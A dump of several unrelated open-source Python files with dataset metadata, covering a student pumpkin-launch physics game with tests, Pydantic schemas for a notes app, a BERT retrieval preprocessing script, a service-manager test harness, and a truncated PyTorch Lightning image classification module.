pumpkin_display.SCREEN_WIDTH\nSCREEN_HEIGHT = pumpkin_display.SCREEN_HEIGHT\nPUMPKIN_X = 25\nPUMPKIN_Y_MIN = 0\nPUMPKIN_Y_MAX = SCREEN_HEIGHT // 2\nPUMPKIN_ANGLE_MIN = 0\nPUMPKIN_ANGLE_MAX = 80\nPUMPKIN_v0_MIN = 10\nPUMPKIN_v0_MAX = 100\nGRAVITY = -9.81\n\n# ------------------------------------------------------\n# Problem 2 \n# ------------------------------------------------------\n# Add your get_valid_integer function here\n# The function get_valid_integer consumes (prompt, the minimum, and maximum values)\n#to determine wether the number entered for height, angle, and velocity of the pumpkin is in the range of possiblities \ndef get_valid_integer(prompt, minimum, maximum):\n while True:\n try:\n n = int(input(prompt))\n if minimum <= n <= maximum:\n return n\n print(\"Invalid attempt the number entered was not in between \", minimum, \" and \", maximum)\n except:\n print(\"Please enter an integer\")\n\n#------------------------------------------------------\n# Problem 3\n#------------------------------------------------------\n# Add your get_yes_or_no function here\n# The function get_yes_or_no consumes a string (either \"yes\" or \"no\") and returns the users answer\ndef get_yes_or_no(string):\n yes_no = input(\"Enter yes or no \")\n # This while loop takes the input from the user and if that input is not equal to yes or no\n #it asks for a new input of yes or no until yes or no is inputted\n while(yes_no.lower()!=\"yes\" and yes_no.lower()!=\"no\"):\n print(\"Invalid Input\")\n yes_no = input(\"Enter yes or no \")\n #Once a yes or a no is inputted the result is returned\n return yes_no\n\n#------------------------------------------------------\n# Problem 4\n#------------------------------------------------------\ndef set_up_target():\n \n # intially our target will be at a set location \n #x_target = SCREEN_WIDTH - 100\n #y_target = 100\n \n # after your program is developed and working correctly\n # set the target at a random location\n # using the following statements\n \n x_target = random.randrange(SCREEN_WIDTH // 2, SCREEN_WIDTH - 99, 50)\n y_target = random.randrange(10, (1 + SCREEN_HEIGHT // 5),10) \n \n print(\"Target is\", x_target,\" meters away and at a height =\",y_target)\n return x_target, y_target\n\n#------------------------------------------------------\n# Problem 5 A\n#------------------------------------------------------\n# Add your get_init_pumpkin_height here\n# The function get_init_pumpkin_height uses the get_valid_integer function\n# Then it asks for a users input on the height of the pumpkin\n# If the pumpkin is between the Max and Min values set up in the global constants then it returns the height\ndef get_init_pumpkin_height():\n height = get_valid_integer(\"Enter pumpkin height: \", PUMPKIN_Y_MIN, PUMPKIN_Y_MAX)\n return height\n\n#------------------------------------------------------\n# Problem 5 B\n#------------------------------------------------------\n# Add your get_pumpkin_angle here\n# The function get_pumpkin_angle uses the get_valid_integer function\n# Then it asks for a users input on the angle of the pumpkin's launch\n# If the pumpkin's angle is between the Max and Min values set up in the global constants then it returns the angle\ndef get_pumpkin_angle():\n angle = get_valid_integer(\"Enter the angle at which you would like to launch the pumkin: \", PUMPKIN_ANGLE_MIN, PUMPKIN_ANGLE_MAX)\n return angle\n\n#------------------------------------------------------\n# Problem 5 C\n#------------------------------------------------------\n# Add 
your get_pumpkin_v0 here\n# The function get_pumpkin_v0 uses the get_valid_integer function\n# Then it asks for a users input on the velocity of the pumpkin\n# If the pumpkin is between the Max and Min values set up in the global constants then it returns the velocity\ndef get_pumpkin_v0():\n v0 = get_valid_integer(\"Enter the velocity at which you would like to launch the pumpkin: \", PUMPKIN_v0_MIN, PUMPKIN_v0_MAX)\n return v0\n\n#------------------------------------------------------\n# Problem 6\n#------------------------------------------------------\n# Add your set_up_pumpkin function here\n# The function set_up_pumpkin takes the height, angle, and velocity returned from the functions\n# get_init_pumpkn_height, get_pumpkin_angle, and get_pumpkin_v0 and sets the values equal to variables\n# which can be returned by calling this function \ndef set_up_pumpkin():\n PUMPKIN_Y = 0\n PUMPKIN_Y = get_init_pumpkin_height()\n angle = get_pumpkin_angle()\n velocity = get_pumpkin_v0()\n return (PUMPKIN_X ,PUMPKIN_Y,angle,velocity)\n\n#------------------------------------------------------\n# Problem 7\n#------------------------------------------------------\n# Add your chunk_punkin function here\n# The function chunk_punkin consmes the velocity and the angle\n# then finds the velocity in the x direction and the velocity in the y direction\ndef chunk_punkin(v0, angle):\n # The radians function mst be used because the angles need to be converted from degrees to radians\n # for python to read\n angleRadian = math.radians(angle)\n vx = round(v0 * math.cos(angleRadian), 2)\n vy = round(v0 * math.sin(angleRadian), 2)\n return (vx, vy)\n\ncisc106.assertEqual(chunk_punkin(30,40),(22.98, 19.28))\ncisc106.assertEqual(chunk_punkin(60,90),(0.0, 60.0))\ncisc106.assertEqual(chunk_punkin(12,50),(7.71, 9.19))\ncisc106.assertEqual(chunk_punkin(30, 25),(27.19, 12.68))\ncisc106.assertEqual(chunk_punkin(80, 60), (40.00, 69.28))\n\n#------------------------------------------------------\n# Problem 8\n#------------------------------------------------------\n# Add your move_pumpkin function here\n# The move_pumpkin function takes the orignal x and y coordinates of the pumpkin\n# then adds the velocity coming from the x and y directions and adds it to them\n# The y direction is different from the x due to gravity\n# the new coordinates are returned as well as the new velocity in the y direction\ndef move_pumpkin(PUMPKIN_X, PUMPKIN_Y, vx, vy):\n NEW_PUMPKIN_X = (PUMPKIN_X + vx)\n NEW_PUMPKIN_Y = float(round(PUMPKIN_Y + vy + (0.5 * (GRAVITY)),2))\n NEW_Y_v0 = float(round((vy + GRAVITY),2))\n return (NEW_PUMPKIN_X, NEW_PUMPKIN_Y, NEW_Y_v0)\n\ncisc106.assertEqual(move_pumpkin(100, 150, 20, 25),(120, 170.09, 15.19))\ncisc106.assertEqual(move_pumpkin(300, 10, 50, -15), (350,-9.91, -24.81))\ncisc106.assertEqual(move_pumpkin(200, 50, 50, 33), (250, 78.09, 23.19))\ncisc106.assertEqual(move_pumpkin(100, 150, 20, 25),(120, 170.09, 15.19))\ncisc106.assertEqual(move_pumpkin(300, 10, 50, -15), (350,-9.91, -24.81))\n\n#------------------------------------------------------\n# Problem 9\n#------------------------------------------------------\n# Add your did_hit_target function here\n# The function did_hit_target consumes the x and y coordinates of both the pumpkin and the target\n# Then determines wether the pumpkin hit the target based off of the size of the target\n# And returns a boolean (True or False) for if t did or did not hit the target\ndef did_hit_target(PUMPKIN_X, PUMPKIN_Y, TARGET_X, TARGET_Y):\n 
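# The check below treats the target as a 30x30 hit box: a hit needs both\n    # |PUMPKIN_X - TARGET_X| < 15 and |PUMPKIN_Y - TARGET_Y| < 15, e.g. a pumpkin\n    # at (450, 100) against a target at (460, 105) counts as a hit.\n    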
if((abs(PUMPKIN_X-TARGET_X)<15) and abs(PUMPKIN_Y-TARGET_Y)<15):\n return True\n else:\n return False\n\ncisc106.assertEqual(did_hit_target(450, 100, 460, 105), True)\ncisc106.assertEqual(did_hit_target(450, 100, 460, 125), False)\ncisc106.assertEqual(did_hit_target(150, 20, 30, 100), False)\ncisc106.assertEqual(did_hit_target(99, 60, 300, 133), False)\ncisc106.assertEqual(did_hit_target(100, 0, 500, 100), False)\n#------------------------------------------------------\n# Problem 10\n#------------------------------------------------------\n# Add your is_off_screen function here\n# The function is_off_screen compares the x coordinate with the width of the screen to see if it went off the right side\n# the y coordinate with the height of the screen to see if the pumpkin has gone off the top of the screen\n# and compares both the x and y to 0 to see if the pumpkin went off the bottom or left of the screen \ndef is_off_screen(PUMPKIN_X, PUMPKIN_Y):\n if PUMPKIN_X > SCREEN_WIDTH and PUMPKIN_Y > SCREEN_HEIGHT:\n return False\n elif PUMPKIN_X < 0 and PUMPKIN_Y < 0:\n return False\n else:\n return True\n\ncisc106.assertEqual(is_off_screen(7777, 200),True)\ncisc106.assertEqual(is_off_screen(80, 4),True)\ncisc106.assertEqual(is_off_screen(1000, 601),False)\ncisc106.assertEqual(is_off_screen(100,-100), True)\ncisc106.assertEqual(is_off_screen(800, 100),True)\n \n#------------------------------------------------------\n# Problem 11\n#------------------------------------------------------\n# Add your compute_trajectory function here\n# The function compute_trajectory consumes the x and y coordinates of the targets,\n# the x and y coordinates of the pumpkin, the angle, and the velocity of the pumpkin\n# Then compiles a list where the new values of the x and y coordinates of the pumpkin can be stored\n# so that the x,y coordinates of the pumpkin can be paired and displayed on a graph\n# Then if the pumpkin hits the target or misses a statement is printed explaining and a list of the\n# x and y pumpkin corrdinates are returned\ndef compute_trajectory(x_target, y_target,x_pumpkin, y_pumpkin, angle_pumpkin, v_pumpkin):\n \n # initialize a list of x values. the first element should be the pumpkin’s initial x coordinate\n x_val_list=[x_pumpkin]\n x_val_list=[x_pumpkin]\n \n # initialize a list of y values. 
the first element should be the pumpkin’s initial y coordinate\n y_val_list=[y_pumpkin]\n y_val_list=[y_pumpkin]\n\n # chunk the pumpkin - call the chunk_pumpkin and assign the return values to \n # variables representing the speed in the x direction and the speed in the y direction\n speed=chunk_punkin(v_pumpkin,angle_pumpkin)\n x_velocity=speed[0]\n y_velocity=speed[1]\n\n complete=False\n \n # call move_pumpkin repeatedly until either the pumpkin is off the screen\n # or it hit the target\n # with each iteration, append the pumpkin's new x coordinate to the\n # end of the list of x values\n # and append the new y coordinate to the end of the list of y values\n while (did_hit_target(x_pumpkin,y_pumpkin,x_target,y_target)!=True) and complete==False:\n pumpkin_change=move_pumpkin(x_pumpkin,y_pumpkin,x_velocity,y_velocity)\n x_pumpkin=pumpkin_change[0]\n y_pumpkin=pumpkin_change[1]\n y_velocity=pumpkin_change[2]\n x_val_list.append(x_pumpkin)\n y_val_list.append(y_pumpkin)\n \n # if the pumpkin goes off screen - display a message to the user that they missed\n # if the pumpkin hit the target - display a message to the user that they hit the target\n if did_hit_target(x_pumpkin,y_pumpkin,x_target,y_target)==True:\n print(\"You have hit the target\")\n complete=True\n if (x_pumpkin>SCREEN_WIDTH) or (y_pumpkin>SCREEN_HEIGHT) or (y_pumpkin<0):\n print(\"You have missed the target\")\n complete=True\n \n # return the list of x values followed by the list of y values\n\n return (x_val_list),(y_val_list)\n\n\n#------------------------------------------------------\n# Problem 13\n#------------------------------------------------------\n# Add your plot_trajectory function here\n# Solve Problem 12 first\n# The function plot_trajectory consumes the x and y lists of the first and second attempts\n# as well as the labels associated with them and the x and y coordinates of the target\n# mat plot is then used to draw out the attempts and circles are displayed\n# the plots are returned \ndef plot_trajectory(X_LIST_1, Y_LIST_1, TAG_1, X_LIST_2, Y_LIST_2, TAG_2, X_TARGET, Y_TARGET):\n fig,ax = plt.subplots()\n ax.plot(X_LIST_1, Y_LIST_1, color=\"green\", label=TAG_1)\n ax.plot(X_LIST_2, Y_LIST_2, color=\"red\", label=TAG_2)\n ax.legend()\n ax.grid()\n plt.title(\"Punkin Chunkin Trajectory\")\n plt.xlabel(\"Distance\")\n plt.ylabel(\"Height\")\n index_1=len(X_LIST_1)-1\n index_2=len(X_LIST_2)-1\n ax.add_artist(plt.Circle(((X_LIST_1[index_1],Y_LIST_2[index_1])), 15, color='orange'))\n ax.add_artist(plt.Circle(((X_LIST_2[index_2],Y_LIST_2[index_2])), 15, color='red'))\n plt.show()\n return fig,ax \n\n#------------------------------------------------------\n# Problem 12 & Problem 14\n#------------------------------------------------------\n# Add your play_punkin_chunkin function here\n# The function play_punkin_chunkin explains the game to the user\n# then asks if the user would like to use two practice shots\n# if the player answers yes they are able to try to hit the target two times\n# before ther actal attempt. If the user enters no they must do their actaual attempt\n# If the user hits the target a message will be displayed telling them so and if they miss\n# a message will be displayed telling them\ndef play_punkin_chunkin():\n print(\"Hello and welcome to the game Punkin Chunkin! 
\\nThe objective of this game is to launch a pumpkin and hit a target.\\nYou will need to enter in the angle and velocity at which you launch the pumpkin.\\n\")\n TARGET_X, TARGET_Y = set_up_target()\n print(\"You will get two trials turns\\nWould you like to practice?\")\n if get_yes_or_no(\"Would you like to practice before you begin?\") ==\"yes\":\n \n print(\"\\nThis is trial number 1\")\n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n X_LIST_1, Y_LIST_1 = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n TAG_1 = \"Pumpkin Trial 1\"\n \n print(\"\\nThis is trial number 2\")\n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n X_LIST_2, Y_LIST_2 = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n TAG_2 = \"Pumpkin Trial 2\"\n \n plot_trajectory(X_LIST_1, Y_LIST_1, TAG_1, X_LIST_2, Y_LIST_2, TAG_2, TARGET_X, TARGET_Y)\n \n \n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n x_val_list, y_val_list = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n pumpkin_display.display_chunk(x_val_list, y_val_list, angle, TARGET_X, TARGET_Y)\n \n \nif __name__ == \"__main__\":\n play_punkin_chunkin()\n\n\n","repo_name":"calumsudo/PunkinChunkin","sub_path":"punkin_chunkin.py","file_name":"punkin_chunkin.py","file_ext":"py","file_size_in_byte":14599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659533313","text":"from __future__ import annotations\n\nimport datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Field, EmailStr\n\nfrom .static.enums import NoteTypeEnumDB, NotesCompletedEnum, \\\n\tNotesOrderByEnum, NotesPeriodEnum, NoteTypeEnum\n\n\nclass Token(BaseModel):\n\taccess_token: str\n\ttoken_type: str\n\n\nclass TokenData(BaseModel):\n\temail: Optional[str] = None\n\n\nclass NoteBase(BaseModel):\n\tnote_type: Optional[NoteTypeEnumDB] = Field(\n\t\ttitle=\"Note type - note/task\",\n\t\texample=\"task\",\n\t\tdefault=NoteTypeEnumDB.note.value\n\t)\n\ttext: str = Field(\n\t\tmax_length=1000,\n\t\ttitle=\"Note/task content field\",\n\t\texample=\"Needs for walking today\"\n\t)\n\tdate: Optional[datetime.date] = Field(\n\t\ttitle=\"Note/task date\",\n\t\tdescription=\"Current date by default\",\n\t\tdefault_factory=datetime.date.today\n\t)\n\tcreated_at: Optional[datetime.datetime] = Field(\n\t\ttitle=\"Note creating datetime\",\n\t\tdescription=\"Current date/time by default\",\n\t\tdefault_factory=datetime.datetime.now\n\t)\n\tuser_id: Optional[int] = Field(ge=1)\n\n\nclass NoteCreate(NoteBase):\n\t\"\"\"\n\tИД пользователя определяется в момент создания заметки (после проверки токена)\n\t\"\"\"\n\tpass\n\n\nclass Note(NoteBase):\n\tid: int = Field(ge=1)\n\tcompleted: Optional[bool] = Field(\n\t\ttitle=\"Is task completed?\",\n\t\tdescription=\"Note could be completed if its type is task.\\n\"\n\t\t\t\t\t\"If note type is standard note, this field is null.\"\n\t)\n\n\tclass Config:\n\t\torm_mode = True\n\n\nclass NoteUpdate(BaseModel):\n\tnote_type: Optional[NoteTypeEnumDB] = Field(\n\t\ttitle=\"Note type - note/task\",\n\t\texample=NoteTypeEnumDB.task.value,\n\t\tdefault=None\n\t)\n\ttext: Optional[str] = Field(\n\t\tmax_length=1000,\n\t\ttitle=\"Note/task content field\",\n\t\texample=\"Needs for walking today\",\n\t\tdefault=None\n\t)\n\tdate: Optional[datetime.date] = Field(\n\t\ttitle=\"Note/task date\",\n\t\tdefault=None\n\t)\n\tcompleted: Optional[bool] = None\n\n\nclass UserBase(BaseModel):\n\temail: EmailStr 
= Field(\n\t\ttitle=\"User's email\",\n\t\texample=\"ijoech@gmail.com\"\n\t)\n\tfirst_name: str = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User first name, required\",\n\t\texample=\"Yaroslav\"\n\t)\n\tlast_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User last name, optional\",\n\t\texample=\"Ivanov\",\n\t\tdefault=None\n\t)\n\tregistered_at: Optional[datetime.datetime] = Field(\n\t\tdefault_factory=datetime.datetime.now\n\t)\n\n\nclass UserCreate(UserBase):\n\tpassword: str = Field(min_length=8)\n\n\nclass User(UserBase):\n\tid: int = Field(ge=1)\n\tis_staff: Optional[bool] = Field(\n\t\ttitle=\"True if user has staff-permissions\",\n\t\tdefault=False\n\t)\n\tdisabled: Optional[bool] = Field(\n\t\ttitle=\"False if user is active and non-blocked\",\n\t\tdefault=False\n\t)\n\n\tclass Config:\n\t\torm_mode = True\n\n\nclass UserInDB(User):\n\thashed_password: str\n\n\nclass UserUpdate(BaseModel):\n\temail: Optional[EmailStr] = Field(\n\t\ttitle=\"User's email\",\n\t\texample=\"ijoech@gmail.com\",\n\t\tdefault=None\n\t)\n\tfirst_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User first name, required\",\n\t\texample=\"Yaroslav\",\n\t\tdefault=None\n\t)\n\tlast_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User last name, optional\",\n\t\texample=\"Ivanov\",\n\t\tdefault=None\n\t)\n\tpassword: Optional[str] = Field(\n\t\tmin_length=8,\n\t\tdefault=None\n\t)\n\tdisabled: Optional[bool] = Field(\n\t\tdescription=\"False if user is active and non-blocked\",\n\t\tdefault=False\n\t)\n\n\nclass GetNotesParams(BaseModel):\n\tsorting: NotesOrderByEnum | None = NotesOrderByEnum.date_asc\n\tperiod: NotesPeriodEnum | None = NotesPeriodEnum.upcoming\n\ttype: NoteTypeEnum | None = NoteTypeEnum.all\n\tcompleted: NotesCompletedEnum | None = NotesCompletedEnum.all\n\n\nclass DayRatingBase(BaseModel):\n\tuser_id: Optional[int] = Field(ge=1)\n\tnotes: Optional[bool] = Field(\n\t\tdescription=\"Rating for tasks of the day (done or not, etc.)\",\n\t\tdefault=None\n\t)\n\tmood: Optional[bool] = Field(\n\t\tdescription=\"Rating for mood of the day\",\n\t\tdefault=None\n\t)\n\thealth: Optional[bool] = Field(\n\t\tdescription=\"Rating for health feeling of the day\",\n\t\tdefault=None\n\t)\n\tnext_day_expectations: Optional[bool] = Field(\n\t\tdescription=\"Positive or negative expectations from the next day\",\n\t\tdefault=None\n\t)\n\n\nclass DayRatingCreate(DayRatingBase):\n\tpass\n\n\nclass DayRating(DayRatingBase):\n\tdate: datetime.date = Field(\n\t\tdescription=\"Date that was rated by user\"\n\t)\n\n\nclass DayRatingUpdate(DayRatingBase):\n\tpass\n","repo_name":"Dahaka1/eztask","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42127015529","text":"import pandas as pd\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport argparse\n\nfrom datetime import datetime,timezone,timedelta\ndef timestamp(msg=\"\"):\n dt1 = datetime.utcnow().replace(tzinfo=timezone.utc)\n dt2 = dt1.astimezone(timezone(timedelta(hours=8))) # 轉換時區 -> 東八區\n print(str(dt2)[:-13] + '\\t' + msg)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-LM\",default=\"bert-base-uncased\", type=str)\nparser.add_argument(\"-bert_data_path\", type=str, required=True) # \"./dataset/1+3_bert_data.pt\"\nparser.add_argument(\"-mode\", type=str, choices=[\"train\", \"test\"], required=True)\nargs = parser.parse_args()\n\ndoc_df = 
pd.read_csv(\"./dataset/documents.csv\")\ndoc_df = doc_df.set_index('doc_id')\ndoc_df = doc_df.fillna(\"\")\ndoc_dict = doc_df.to_dict()['doc_text']\ntrain_q_df = pd.read_csv(\"./dataset/train_queries.csv\")\ntest_q_df = pd.read_csv(\"./dataset/test_queries.csv\")\n\nimport random\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained(args.LM)\n\ndef df_2_bert(mode, df, document_dict):\n assert mode in [\"train\", \"test\", \"dev\"]\n bert_data = []\n q_id_list = df['query_id']\n q_list = df['query_text']\n if mode == \"train\":\n pos_doc_ids_list = df['pos_doc_ids']\n bm25_top1000_list = df['bm25_top1000']\n all_used_doc = []\n for doc_list in bm25_top1000_list:\n all_used_doc += [doc for doc in doc_list.split()]\n\n for idx in range(len(q_id_list)):\n pos_doc_ids = pos_doc_ids_list[idx].split()\n for doc_list in pos_doc_ids:\n all_used_doc += [doc_list]\n all_used_doc = list(set(all_used_doc))\n doc_dict = {key: document_dict[key] for key in all_used_doc} \n print(len(doc_dict))\n\n for idx, q_id in tqdm(enumerate(q_id_list)):\n query = q_list[idx]\n if mode == \"train\":\n # 1 positive, 3 negative\n neg_doc = list(set(bm25_top1000_list[idx].split()) - set(pos_doc_ids_list[idx].split()))\n \n for r_doc in pos_doc_ids_list[idx].split():\n batch_q = [query]*4\n batch_doc = [doc_dict[r_doc]]\n\n sampled_neg_doc = random.sample(neg_doc, 3) # 3 negative\n for nr_doc in sampled_neg_doc:\n batch_doc += [doc_dict[nr_doc]]\n bert_dict = tokenizer(batch_q, batch_doc,\n max_length=512,\n padding='max_length',\n return_token_type_ids=True,\n truncation=True) # dict of tensor {ids:[]...}\n bert_dict['q_id'] = [q_id]*4\n bert_dict['doc_id'] = [r_doc] + sampled_neg_doc\n bert_dict['label'] = [1] + [0]*3\n bert_data += [bert_dict]\n\n elif mode == \"test\":\n for doc in bm25_top1000_list[idx].split():\n bert_dict = tokenizer(query, doc_dict[doc],\n max_length=512,\n padding='max_length',\n return_token_type_ids=True,\n truncation=True) # dict of tensor {ids:[]...}\n bert_dict['q_id'] = q_id\n bert_dict['doc_id'] = doc\n bert_data += [bert_dict]\n \n return bert_data # List[Dict[List]] = List[tokenizer output]\n\ntrain_bert_data = df_2_bert(args.mode, train_q_df, doc_dict)\ntorch.save(train_bert_data, args.bert_data_path)","repo_name":"DannyLeee/transformer-based-IR-system","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15796203514","text":"import logging\nimport os\nimport subprocess\nimport tempfile\nimport time\n\nimport object_database\nfrom object_database.util import genToken\nfrom object_database.service_manager.ServiceManager import ServiceManager\n\nfrom object_database import core_schema, connect, service_schema\nfrom object_database.frontends import service_manager\n\nownDir = os.path.dirname(os.path.abspath(__file__))\n\nVERBOSE = True\n# Turn VERBOSE off on TravisCI because subprocess.PIPE seems to lock things up\nVERBOSE = False if os.environ.get(\"TRAVIS_CI\", None) else VERBOSE\n\n\nclass ServiceManagerTestCommon(object):\n # set to False if you want your test harness to dump logs of individual services\n # directly into the test harness. 
This can be very verbose if you have lots of\n # services, and make it hard to see the test output, so its off by default.\n LOGS_IN_FILES = True\n\n ENVIRONMENT_WAIT_MULTIPLIER = 5 if os.environ.get(\"TRAVIS_CI\", None) is not None else 1\n\n # set to an integer to test running the services over a proxy port.\n PROXY_SERVER_PORT = None\n ODB_PORT = 8023\n\n def schemasToSubscribeTo(self):\n \"\"\"Subclasses can override to extend the schema set.\"\"\"\n return []\n\n def waitRunning(self, serviceName):\n self.assertTrue(\n ServiceManager.waitRunning(\n self.database, serviceName, 5.0 * self.ENVIRONMENT_WAIT_MULTIPLIER\n ),\n \"Service \" + serviceName + \" never came up.\",\n )\n\n def timeElapsed(self):\n return time.time() - self.test_start_time\n\n def setUp(self):\n self.logger = logging.getLogger(__name__)\n self.test_start_time = time.time()\n self.token = genToken()\n self.tempDirObj = tempfile.TemporaryDirectory()\n self.tempDirectoryName = self.tempDirObj.name\n object_database.service_manager.Codebase.setCodebaseInstantiationDirectory(\n self.tempDirectoryName, forceReset=True\n )\n\n os.makedirs(os.path.join(self.tempDirectoryName, \"source\"))\n os.makedirs(os.path.join(self.tempDirectoryName, \"storage\"))\n os.makedirs(os.path.join(self.tempDirectoryName, \"logs\"))\n\n self.logDir = os.path.join(self.tempDirectoryName, \"logs\")\n\n logLevelName = logging.getLevelName(logging.getLogger(__name__).getEffectiveLevel())\n\n self.server = service_manager.startServiceManagerProcess(\n self.tempDirectoryName,\n self.ODB_PORT,\n self.token,\n loglevelName=logLevelName,\n sslPath=os.path.join(ownDir, \"..\", \"..\", \"testcert.cert\"),\n verbose=VERBOSE,\n proxyPort=self.PROXY_SERVER_PORT,\n logDir=self.LOGS_IN_FILES,\n )\n\n try:\n self.database = connect(\n \"localhost\", self.PROXY_SERVER_PORT or self.ODB_PORT, self.token, retry=True\n )\n self.database.subscribeToSchema(\n core_schema, service_schema, *self.schemasToSubscribeTo()\n )\n except Exception:\n self.logger.error(\"Failed to initialize for test\")\n self.server.terminate()\n self.server.wait()\n self.tempDirObj.cleanup()\n raise\n\n def newDbConnection(self):\n return connect(\n \"localhost\", self.PROXY_SERVER_PORT or self.ODB_PORT, self.token, retry=True\n )\n\n def tearDown(self):\n self.server.terminate()\n try:\n self.server.wait(timeout=15.0)\n except subprocess.TimeoutExpired:\n self.logger.warning(\n \"Failed to gracefully terminate service manager. 
Sending KILL signal\"\n )\n self.server.kill()\n try:\n self.server.wait(timeout=5.0)\n except subprocess.TimeoutExpired:\n self.logger.error(\"Failed to kill service manager process.\")\n\n try:\n self.tempDirObj.cleanup()\n except Exception:\n # race conditions can cause problems here\n try:\n time.sleep(1.0)\n self.tempDirObj.cleanup()\n except Exception:\n pass\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/service_manager/ServiceManagerTestCommon.py","file_name":"ServiceManagerTestCommon.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"33518507179","text":"from typing import Any, List\nimport torch\nimport torch.nn as nn\nimport timm\nfrom pytorch_lightning import LightningModule, Trainer\nfrom torchmetrics import MaxMetric, ConfusionMatrix, F1Score, CohenKappa, Accuracy\nfrom src.utils import get_shuffled_label\nfrom src.utils import get_shuffled_label, get_confmat\nimport wandb, numpy as np\nfrom src.datamodules.colon_datamodule import ColonDataset, ColonDataModule\nimport pandas as pd\n\nimport albumentations as A\nfrom albumentations.core.composition import Compose, OneOf\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import DataLoader, Dataset\nimport cv2\n\ndata_cnt = 0\n\nclass ClassifyCompareLitModule(LightningModule):\n def __init__(\n self,\n lr: float = 1e-4,\n weight_decay: float = 0.0005,\n t_max: int = 20,\n min_lr: int = 1e-6,\n T_0=15,\n T_mult=2,\n key='None',\n threshold=0.1,\n eta_min=1e-6,\n name=\"vit_base_patch16_224\",\n pretrained=True,\n scheduler=\"CosineAnnealingLR\",\n factor=0.5,\n patience=5,\n eps=1e-08,\n loss_weight=0.5,\n module_type=\"classifycompare\",\n implementation_model=False,\n class_cnt=4,\n ):\n\n super().__init__()\n self.save_hyperparameters(logger=False)\n\n self.model = timm.create_model(\n self.hparams.name, pretrained=self.hparams.pretrained, num_classes=class_cnt)\n\n\n self.discriminator_layer1 = nn.Sequential(\n nn.Linear(self.model.classifier.in_features, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, class_cnt),\n ) if 'net' in self.hparams.name else nn.Sequential(\n nn.Linear(self.model.head.in_features, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, class_cnt),\n )\n self.discriminator_layer2 = nn.Sequential(\n nn.Linear(self.model.classifier.in_features*2, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 3),\n ) if 'net' in self.hparams.name else nn.Sequential(\n nn.Linear(self.model.head.in_features*2, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 3),\n )\n\n self.criterion = torch.nn.CrossEntropyLoss()\n self.train_acc = Accuracy()\n self.val_acc = Accuracy()\n self.test_acc = Accuracy()\n self.train_acc_compare = Accuracy()\n self.val_acc_compare = Accuracy()\n self.test_acc_compare = Accuracy()\n self.val_acc_best = MaxMetric()\n self.val_f1_best = MaxMetric()\n self.val_acc_compare_best = MaxMetric()\n self.confusion_matrix = ConfusionMatrix(num_classes=class_cnt)\n self.f1_score = F1Score(num_classes=class_cnt, average=\"macro\")\n self.cohen_kappa = CohenKappa(num_classes=class_cnt, weights=\"quadratic\")\n\n def forward(self, x): # 4 classification\n return 
self.discriminator_layer1(self.get_features(x.float()))\n\n def get_features(self, x):\n \"\"\"get features from timm models\n\n Since densenet code is quite different from vit models, the extract part is different\n \"\"\"\n features = self.model.global_pool(self.model.forward_features(x.float())) if 'densenet' in self.hparams.name else self.model.forward_features(x.float())\n features = features if 'densenet' in self.hparams.name else self.model.forward_head(features, pre_logits=True)\n return features\n\n def get_comparison_list(self, origin, shuffle):\n \"\"\"\n get comparison answers from the pair of original and shuffled classes\n \"\"\"\n comparison = []\n for i, j in zip(origin.tolist(), shuffle.tolist()):\n if i > j: # >(origin)\n comparison.append(0)\n elif i == j:\n comparison.append(1)\n else:\n comparison.append(2)\n return torch.tensor(comparison, device=self.device)\n\n def get_memory_fifo_comparison_list(self, origin, shuffle):\n \"\"\"\n get comparison answers from the pair of original and shuffled classes\n \"\"\"\n result_compare = []\n for origin_value in origin.tolist():\n comparison = []\n for class_wise_value in shuffle:\n if origin_value > class_wise_value:\n comparison.append(0)\n elif origin_value == class_wise_value:\n comparison.append(1)\n else:\n comparison.append(2)\n result_compare.append(comparison)\n\n return torch.tensor(result_compare, device=self.device)\n\n def shuffle_batch(self, x, y):\n\n indices, shuffle_y = get_shuffled_label(x, y)\n comparison = self.get_comparison_list(y, shuffle_y)\n\n return indices, comparison, shuffle_y\n\n\n def step(self, batch):\n x, y = batch\n features = self.get_features(x)\n logits_4cls = self.discriminator_layer1(features)\n loss_4cls = self.criterion(logits_4cls, y)\n preds_4cls = torch.argmax(logits_4cls, dim=1)\n\n shuffle_indices, comparison, shuffle_y = self.shuffle_batch(x, y)\n 